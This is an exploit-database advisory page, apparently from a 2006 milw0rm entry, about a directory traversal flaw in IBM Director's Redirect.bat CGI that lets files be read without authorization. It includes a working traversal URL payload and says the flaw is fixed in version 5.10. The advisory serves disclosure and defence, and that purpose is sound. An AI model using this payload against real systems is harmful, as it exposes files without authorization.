header-logo
Suggest Exploit
vendor:
Director
by:
Daniel Clemens
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Director
Affected Version From: N/A
Affected Version To: 5.10
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Directory Traversal in IBM Director CGI Redirect.bat File

There is a vulnerability within the Redirect.bat file on a ibm director cgi which allows a directory transversal to take place which in turn exposes most files on the system to be read without authorization.

Mitigation:

Upgrade to the latest version of IBM Director (5.10)
Source

Exploit-DB raw data:

There is a vulnerability within the Redirect.bat file on a ibm director
cgi which allows a directory transversal to take place which in turn
exposes most files on the system to be read without authorization.

http://ip.of.system:411/cgi-bin/Redirect.bat?file=%7C..\..\..\..\..\..\....\..\program%20files\ibm\director\version.key (or insert evil file here)


This was fixed in the 5.10 version of ibm director.

-Daniel Clemens

# milw0rm.com [2006-09-07]

Navigation

Suggest Exploit

Services By CQR